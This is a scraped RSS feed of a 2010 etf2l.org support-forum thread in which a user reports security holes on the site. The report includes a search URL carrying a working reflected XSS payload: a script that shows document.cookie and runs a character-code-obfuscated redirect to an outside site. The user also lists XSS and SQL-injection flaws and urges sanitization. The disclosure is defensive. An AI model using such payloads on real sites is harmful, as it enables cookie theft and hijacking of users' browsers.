https://staging.etf2l.org/forum/support/topic-14040/ https://staging.etf2l.org/forum/support/topic-14040/page-1/?recent=239036#post=239036 generator=rsdiscuss&baseurl=https://staging.etf2l.org&feed=forum&forum=support&topic=14040&post=239036 Mon, 01 Nov 2010 23:14:42 +0100 https://staging.etf2l.org/forum/support/topic-14040/page-1/?recent=239036#post=238985 generator=rsdiscuss&baseurl=https://staging.etf2l.org&feed=forum&forum=support&topic=14040&post=238985 Mon, 01 Nov 2010 20:11:54 +0100 https://staging.etf2l.org/forum/support/topic-14040/page-1/?recent=239036#post=238981 generator=rsdiscuss&baseurl=https://staging.etf2l.org&feed=forum&forum=support&topic=14040&post=238981 Mon, 01 Nov 2010 20:04:00 +0100 https://staging.etf2l.org/forum/support/topic-14040/page-1/?recent=239036#post=238980 http://etf2l.org/search/%22%3Cscript%3Ealert(document.cookie);eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,121,111,117,102,97,105,108,46,111,114,103,34));%3C/script%3E/Also the search function is broken.[/url] Umptieth time I come across something like this on etf2l (XSS on team pages, country flags, recruitment posts, SQL-injection vulnerabilities on the RSS feed, forum tracker, video browser, etc). Stuff goes in -> Sanitize for SQL-injections (time to look into prepared statements?) Stuff comes out -> Check for HTML and JS This isn't rocket science.]]> generator=rsdiscuss&baseurl=https://staging.etf2l.org&feed=forum&forum=support&topic=14040&post=238980 Mon, 01 Nov 2010 19:57:39 +0100